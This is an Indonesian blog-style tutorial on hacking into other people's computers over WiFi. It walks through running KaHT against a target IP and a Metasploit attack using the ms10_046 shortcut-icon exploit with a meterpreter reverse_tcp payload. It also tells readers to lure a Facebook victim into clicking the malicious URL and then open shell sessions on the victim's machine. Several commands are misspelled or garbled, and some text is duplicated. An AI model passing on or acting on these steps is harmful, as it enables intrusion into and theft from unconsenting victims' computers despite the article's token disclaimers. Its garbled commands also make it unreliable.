Cara Menyusup Ke Komputer Orang Lain Melalui WiFi? Nih Tutorial Dahsyatnya Buat Anda!

Cara menyusup ke komputer orang lain melalui WiFi, menjadi salah satu tutorial yang banyak dicari millenials di era digital ini. Entah digunakan hanya untuk iseng-iseng doang, maupun untuk mengembangkan bakat di bidang programming. Hacking menjadi kategori  cukup besar untuk diminati para pemula yang baru terjun ke dunia komputer.

Cara menyusup ke komputer orang lain melalui WiFi, menjadi salah satu tutorial yang banyak dicari millenials di era digital ini. Entah digunakan hanya

Alasannya, karena mereka merasa tertantang. Selain itu, juga untuk mengetahui banyak hal dari rahasia orang lain serta menjadi ajang uji nyali. Nah, bagi kalian yang penasaran maka langsung cus aja berikut cara menyusup ke komputer orang lain melalui WiFi untuk Anda!

Baca juga : Cara Masuk ke Komputer Orang Lain Lewat Jaringan LAN

Nih Cara Menyusup Ke Komputer Orang Lain Melalui WiFi, Opsi Pertama Yang Bisa Anda Gunakan!

Berikut opsi pertama yang akan memberikan panduan untuk Anda dalam membobol komputer orang lain. Tutorial ini dapat dilakukan oleh siapapun, dan pastikan gunakan dalam hal kebaikan.

Simak secara seksama dan kemudian praktikkan, karena ini memerlukan pemahaman terkait coding. So, langsung saja cus cek berikut ini Guys!

  1. Pertama masuk ke command prompt > buka run > kemudian ketikan cmd
  2. Setelah command prompt terbuka ketik netview, untuk mengetahui siapa saja yang terhubung dengan jaringan.
  3. Untuk mengetahui IP target saya melakukan perintah ping.
  4. Gunakan perintah ipconfig untuk mendapatkannya.
  5. Saya lalu mencari file KaHT.exe berada. Jalankan dengan perintah KaHT [spasi] IP_sebelum_IP_target [spasi] IP_target.
  6. Berhasil. Untuk mengetahuinya kita bisa mengecek IP kita.

 

Nih Cara Menyusup Ke Komputer Orang Lain Melalui WiFi, Dengan Open Metasploit Di CMD atau Terminal Backtrack!

  1. Pertama silahkan kalian download metasploit dahulu, lalu buka terlebih dahulu CMD atau terminal dan kemudian silahkan Anda jalankan metasploitnya.
  2. Kemudian ketikan perintah “cd (letak directory)” misalnya lokasinya di cd c:\metasploittekan enter.
  3. Lalu ketikan perintah selanjutnya sudo chmod +x (nama metesploit).
  4. Run tekan enter.
  5. Perintah kode berikutnya sudo ./(nama metasploit)
  6. Run tekan enter
  7. dan ketik selanjutnya msfconsole tekan enter.
  8. Lalu kalian ketikan use exploit/windows/browser/ms10_046_shorcut_icon_dllloader

 

Nih Cara Menyusup Ke Komputer Orang Lain Melalui WiFi, Untuk Mengetahui Alamat IP Komputer Orang Lain!

  1. Silahkan ketik ifoncfig dan kalian akan melihat alamat IP Anda, setelah itu ketikan set srvhost (Alamat IP kalian) tekan enter dan set lhost (alamat ip kalian).
  2. Selanjutnya ketikan set PAYLOAD windows/meterpreteer/reverse_tcp tekan enter dan untuk mengetahui berhasil atau tidaknya ketikan show options selanjutnya ketikan exploit, dan kalian akan mendapatkan url IP, misalnya seperti alamat url http://192.???.?? dan berikutnya kalian mengirimkan alamat url tersebut melalui facebook yang menjadi target Anda agar mengklik alamat url.
  3. Selanjutnya, Anda akan mengetahui korban yang telah mengklik alamat url dengan mengetikan sessions -i dan ketikan lagi sessions -i 1.

 

Cara Menyusup Ke Komputer Orang Lain Melalui WiFi, Dengan CMD atau Terminal

Setelah pada sessions -i kalian akan melihat komputer mana saja yang telah mengklik alamat url IP Anda, dan sekarang kalian akan mengeksekusi target dengan mengetikan shell sysinfo. Berikutnya, Anda akan melihat berbagai directory atau folder di komputer target.

Itulah cara hack komputer orang lain menggunakan CMD dan menyusup ke komputer orang lain dari jarak jauh. Cara diatas bisa menjadi pengetahuan untuk Anda yang ingin mengetahui dunia hacking lebih dalam. Jadi, gunakan cara diatas dengan bijak.

Sebaiknya jangan gunakan cara diatas sembarangan, karena dapat merugikan orang lain. Cara menyusup ke komputer orang lain juga bisa kalian praktekan, mungkin pada teman sendiri dan pastinya dengan persetujuan terlebih dahulu supaya tidak ada yang merasa dirugikan. 

 

Demikianlah artikel dari kami yang mengulas tentang, cara menyusup ke komputer orang lain melalui WiFi. Sehingga, akan menjawab rasa penasaran kalian mengenai dunia hacking yang baru pemula dalam mengawali bidang tersebut. Pastikan Anda menggunakan tutorial ini secara bijak dan dalam hal kebaikan.

Baca juga : Cara Masuk ke Komputer Orang Lain Lewat iP Address

Jangan disalahgunakan pada tindakan merugikan orang lain, diri sendiri dan melanggar hukum. Oke Guys, sekian dari kami dan terimakasih. Jangan lupa, tinggalkan pendapat kalian di kolom komentar!

 

Tinggalkan komentar